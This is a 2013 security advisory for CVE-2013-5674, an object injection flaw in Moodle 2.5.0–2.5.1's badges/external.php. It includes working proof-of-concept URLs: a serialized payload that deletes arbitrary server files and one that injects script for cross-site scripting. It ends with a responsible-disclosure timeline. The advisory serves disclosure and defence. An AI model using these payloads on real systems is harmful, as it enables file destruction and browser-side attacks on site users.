Moodle 2.5.0-1 badges/external.php PHP Object Injection

2013-09-16 12:58:30 » advisory, CVE-2013-5674, moodle, object injection, pentesting, php, security, vulnerability, xss

Moodle CMS versions 2.5.0 and 2.5.1 are prone to Object Injection vulnerability passing not properly sanitized user-supplied input to the unserialize() PHP function.

Attacker could inject ad-hoc serialized object into the application scope, reusing internal PHP code snippets maliciously. In this application the attacker could delete files and perform a XSS attacks.

Vulnerability

Affected file badges/external.php unserialize user input in line 35

1
2
$json = required_param('badge', PARAM_RAW);
$badge = new external_badge(unserialize($json));

POC

To exploit this kind of vulnerability is necessary to find reusable functions called during the life time of the object instance. As explained in the PHP manual magic method explanation, two functions are always called:

  • __wakeup(): Function called at the wake up of the sleeping unserialized object.
  • __destroy(): Similarly to others object-oriented languages, PHP calls the destructor of the object at the instance end of life.

Moreover, on this particular object instance two other __get(string $name) function are called, in the form of instance->$name.

  • __get("assertion"): Called in badges/renderer.php:377 $issued->assertion
  • __get("imageUrl"): Called in badges/renderer.php:389 array('src' => $issued->imageUrl)

FILE DELETE

The method csv_export_writer::__destruct() in lib/csvlib.class.php:538 contains

1
2
3
4
    public function __destruct() {
        fclose($this->fp);
        unlink($this->path);
    }

So can be exploited to delete remote file passing the serialized object. Here the POC to delete /path/of/the/file/to/delete:

1
http://localhost/badges/external.php?badge=O:17:"csv_export_writer":1:{s:4:"path";s:27:"/path/of/the/file/to/delete";}

XSS

The vulnerable script badges/external.php returns an HTML page built with the injected unserialized $badge object in line 43

1
echo $output->render($badge);

The rendered HTML page constructed in the core_badges_renderer::render_external_badge() reflects the two object variable assertion and imageurl, as that can be used as XSS vector. Here the POC of the XSS:

1
http://localhost/badges/external.php?badge=O:8:"stdClass":2:{s:8:"imageUrl";s:0:"";s:9:"assertion";O:8:"stdClass":1:{s:5:"badge";O:8:"stdClass":1:{s:6:"issuer";O:8:"stdClass":1:{s:4:"name";s:30:"<script>alert(1);</script><!--";}}}}

CVE REFERENCE

The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2013-5674 to the vulnerability

DISCLOSURE

29/Jul/2013: Vendor alerted with MDL-40924 ticket
02/Sep/2013: Released fix commit 2d3c0faef by Yuliya Bozhko
07/Sep/2013: Moodle release 2.5.2
16/Sep/2013: Public disclosure

Comments

comments powered by Disqus